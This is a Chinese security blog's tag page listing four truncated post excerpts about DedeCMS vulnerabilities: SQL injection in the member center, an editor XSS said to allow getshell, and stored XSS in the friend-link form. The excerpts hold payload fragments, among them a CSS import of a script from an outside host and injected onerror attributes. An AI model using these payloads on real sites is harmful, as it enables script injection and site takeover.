标签 dedecms 下的文章

DEDECMS会员中心注入2

Author:Sunshie QQ:1141056911 Blog:http://phpinfo.me F4ck Team & Ezenteam #######################http://www.wooyun.org/corps/Dedecms乌云上已经刷爆啦  但是没公开细节漏洞文件member/pm.php (官方已修补)下载补丁下来看看member/pm.ph...

没穿底裤 2014 年 01 月 15 日 暂无评论

DEDECMS最新注入一枚

Author:Sunshie QQ:1141056911 Blog:http://phpinfo.me F4ck Team & Ezenteam #######################今天无聊逛乌云发现有人提交了个漏洞,不知道和我的是不是一样的,没公开看不了去官网看了下还没出补丁  更新时间:2013年9月12日于是我下载了DEDECMS到本地来看看  &...

没穿底裤 2014 年 01 月 15 日 1 条评论

dedecms xss 0day通杀所有版本 可getshell

洞原因:DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个:开启注册开启投稿注册会员-发表文章投稿, 内容如下填写: [php]@im\port'\http://0day5.com/xs...

没穿底裤 2014 年 01 月 02 日 4 条评论

dede5.7前台插入恶意JS代码

这个问题应该很久了 最近发现有用这个的蠕虫 dede 前台提交友情链接 只用htmlspecialchars简单处理了一下 可以插入代码 plus/flink_add.php 提交表单中提交 图片地址http://111.cc ' onerror='alert(98);'http://111.cc 'onerror=location.href='http://www.baidu.com只用h...

没穿底裤 2013 年 12 月 08 日 暂无评论